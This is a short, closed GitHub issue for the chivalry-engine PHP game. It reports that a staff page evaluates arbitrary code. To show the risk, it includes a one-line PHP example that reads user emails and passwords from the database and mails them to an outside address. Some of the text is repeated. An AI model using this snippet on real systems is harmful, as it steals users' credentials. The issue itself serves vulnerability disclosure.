Closed KyleMassacre closed 6 years ago
This line of code can be very dangerous the way it is used. If someone wanted, and became a staff member they can use any arbitrary code they wanted https://github.com/MasterGeneral156/chivalry-engine/blob/63b7bab8ead210868c62259f797d78a3ceba3262/upload/staff/staff_criminal.php#L201 For example:
$result = $db->fetch_row($db->query(‘select id, username, email, password from users’)); $body = ‘’; foreach($result as $k => $v) { $body .= $v. “ =\t”. $k[$v].”\t”; } mail(‘myemail@gmail.com’, ‘Hacked Results’,$body);
This isn’t even worse case
This line of code can be very dangerous the way it is used. If someone wanted, and became a staff member they can use any arbitrary code they wanted https://github.com/MasterGeneral156/chivalry-engine/blob/63b7bab8ead210868c62259f797d78a3ceba3262/upload/staff/staff_criminal.php#L201 For example:
This isn’t even worse case